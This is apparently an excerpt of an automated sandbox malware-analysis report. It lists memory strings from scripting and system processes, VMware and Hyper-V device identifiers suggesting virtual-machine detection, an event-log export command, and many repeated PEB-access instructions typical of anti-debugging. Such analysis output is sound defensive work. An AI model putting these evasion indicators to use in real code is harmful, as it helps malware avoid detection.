          Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: cmmon32.exe, 00000007.00000002.901229697.00000000006C6000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAWx;q%SystemRoot%\system32\mswsock.dllQ
          Source: wscript.exe, 00000000.00000003.378709397.0000012C249D4000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" DSxxV
          Source: explorer.exe, 00000004.00000003.573784985.0000000008FE8000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: wscript.exe, 00000000.00000003.378433462.0000012C24B43000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: T$output += "(Get-VMNetworkAdapter -all)";
          Source: powershell.exe, 00000001.00000003.391772071.00000210A9F2F000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000004.00000003.548525209.000000000920F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.570659470.000000000920F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.910804188.000000000920F000.00000004.00000001.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
          Source: C:\Windows\SysWOW64\svchost.exe
          Code function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exe
          Code function: 3_2_03A54BAD mov eax, dword ptr fs:[00000030h] 3_2_03A54BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF740D mov eax, dword ptr fs:[00000030h]3_2_03AF740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF740D mov eax, dword ptr fs:[00000030h]3_2_03AF740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF740D mov eax, dword ptr fs:[00000030h]3_2_03AF740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4746D mov eax, dword ptr fs:[00000030h]3_2_03A4746D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A44B mov eax, dword ptr fs:[00000030h]3_2_03A5A44B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC450 mov eax, dword ptr fs:[00000030h]3_2_03ABC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC450 mov eax, dword ptr fs:[00000030h]3_2_03ABC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04570050 mov eax, dword ptr fs:[00000030h]7_2_04570050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04570050 mov eax, dword ptr fs:[00000030h]7_2_04570050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EC450 mov eax, dword ptr fs:[00000030h]7_2_045EC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EC450 mov eax, dword ptr fs:[00000030h]7_2_045EC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04612073 mov eax, dword ptr fs:[00000030h]7_2_04612073
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A44B mov eax, dword ptr fs:[00000030h]7_2_0458A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04621074 mov eax, dword ptr fs:[00000030h]7_2_04621074
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457746D mov eax, dword ptr fs:[00000030h]7_2_0457746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D7016 mov eax, dword ptr fs:[00000030h]7_2_045D7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D7016 mov eax, dword ptr fs:[00000030h]7_2_045D7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D7016 mov eax, dword ptr fs:[00000030h]7_2_045D7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0462740D mov eax, dword ptr fs:[00000030h]7_2_0462740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0462740D mov eax, dword ptr fs:[00000030h]7_2_0462740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0462740D mov eax, dword ptr fs:[00000030h]7_2_0462740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458BC2C mov eax, dword ptr fs:[00000030h]7_2_0458BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04624015 mov eax, dword ptr fs:[00000030h]7_2_04624015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04624015 mov eax, dword ptr fs:[00000030h]7_2_04624015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov ecx, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046114FB mov eax, dword ptr fs:[00000030h]7_2_046114FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6CF0 mov eax, dword ptr fs:[00000030h]7_2_045D6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6CF0 mov eax, dword ptr fs:[00000030h]7_2_045D6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6CF0 mov eax, dword ptr fs:[00000030h]7_2_045D6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628CD6 mov eax, dword ptr fs:[00000030h]7_2_04628CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045558EC mov eax, dword ptr fs:[00000030h]7_2_045558EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456849B mov eax, dword ptr fs:[00000030h]7_2_0456849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559080 mov eax, dword ptr fs:[00000030h]7_2_04559080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D3884 mov eax, dword ptr fs:[00000030h]7_2_045D3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D3884 mov eax, dword ptr fs:[00000030h]7_2_045D3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458F0BF mov ecx, dword ptr fs:[00000030h]7_2_0458F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458F0BF mov eax, dword ptr fs:[00000030h]7_2_0458F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458F0BF mov eax, dword ptr fs:[00000030h]7_2_0458F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045990AF mov eax, dword ptr fs:[00000030h]7_2_045990AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04577D50 mov eax, dword ptr fs:[00000030h]7_2_04577D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457B944 mov eax, dword ptr fs:[00000030h]7_2_0457B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457B944 mov eax, dword ptr fs:[00000030h]7_2_0457B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04593D43 mov eax, dword ptr fs:[00000030h]7_2_04593D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D3540 mov eax, dword ptr fs:[00000030h]7_2_045D3540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457C577 mov eax, dword ptr fs:[00000030h]7_2_0457C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457C577 mov eax, dword ptr fs:[00000030h]7_2_0457C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B171 mov eax, dword ptr fs:[00000030h]7_2_0455B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B171 mov eax, dword ptr fs:[00000030h]7_2_0455B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C962 mov eax, dword ptr fs:[00000030h]7_2_0455C962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559100 mov eax, dword ptr fs:[00000030h]7_2_04559100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559100 mov eax, dword ptr fs:[00000030h]7_2_04559100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559100 mov eax, dword ptr fs:[00000030h]7_2_04559100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628D34 mov eax, dword ptr fs:[00000030h]7_2_04628D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458513A mov eax, dword ptr fs:[00000030h]7_2_0458513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458513A mov eax, dword ptr fs:[00000030h]7_2_0458513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04584D3B mov eax, dword ptr fs:[00000030h]7_2_04584D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04584D3B mov eax, dword ptr fs:[00000030h]7_2_04584D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04584D3B mov eax, dword ptr fs:[00000030h]7_2_04584D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455AD30 mov eax, dword ptr fs:[00000030h]7_2_0455AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045DA537 mov eax, dword ptr fs:[00000030h]7_2_045DA537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov ecx, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461FDE2 mov eax, dword ptr fs:[00000030h]7_2_0461FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04608DF1 mov eax, dword ptr fs:[00000030h]7_2_04608DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov ecx, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6DC9 mov eax, dword ptr fs:[00000030h]7_2_045D6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B1E1 mov eax, dword ptr fs:[00000030h]7_2_0455B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B1E1 mov eax, dword ptr fs:[00000030h]7_2_0455B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B1E1 mov eax, dword ptr fs:[00000030h]7_2_0455B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045E41E8 mov eax, dword ptr fs:[00000030h]7_2_045E41E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456D5E0 mov eax, dword ptr fs:[00000030h]7_2_0456D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456D5E0 mov eax, dword ptr fs:[00000030h]7_2_0456D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458FD9B mov eax, dword ptr fs:[00000030h]7_2_0458FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458FD9B mov eax, dword ptr fs:[00000030h]7_2_0458FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582990 mov eax, dword ptr fs:[00000030h]7_2_04582990
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046205AC mov eax, dword ptr fs:[00000030h]7_2_046205AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046205AC mov eax, dword ptr fs:[00000030h]7_2_046205AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457C182 mov eax, dword ptr fs:[00000030h]7_2_0457C182
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582581 mov eax, dword ptr fs:[00000030h]7_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A185 mov eax, dword ptr fs:[00000030h]7_2_0458A185
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04552D8A mov eax, dword ptr fs:[00000030h]7_2_04552D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D51BE mov eax, dword ptr fs:[00000030h]7_2_045D51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04581DB5 mov eax, dword ptr fs:[00000030h]7_2_04581DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04581DB5 mov eax, dword ptr fs:[00000030h]7_2_04581DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04581DB5 mov eax, dword ptr fs:[00000030h]7_2_04581DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045861A0 mov eax, dword ptr fs:[00000030h]7_2_045861A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045861A0 mov eax, dword ptr fs:[00000030h]7_2_045861A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045835A1 mov eax, dword ptr fs:[00000030h]7_2_045835A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D69A6 mov eax, dword ptr fs:[00000030h]7_2_045D69A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460B260 mov eax, dword ptr fs:[00000030h]7_2_0460B260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460B260 mov eax, dword ptr fs:[00000030h]7_2_0460B260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628A62 mov eax, dword ptr fs:[00000030h]7_2_04628A62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045E4257 mov eax, dword ptr fs:[00000030h]7_2_045E4257
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559240 mov eax, dword ptr fs:[00000030h]7_2_04559240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04567E41 mov eax, dword ptr fs:[00000030h]7_2_04567E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0459927A mov eax, dword ptr fs:[00000030h]7_2_0459927A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457AE73 mov eax, dword ptr fs:[00000030h]7_2_0457AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461EA55 mov eax, dword ptr fs:[00000030h]7_2_0461EA55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456766D mov eax, dword ptr fs:[00000030h]7_2_0456766D
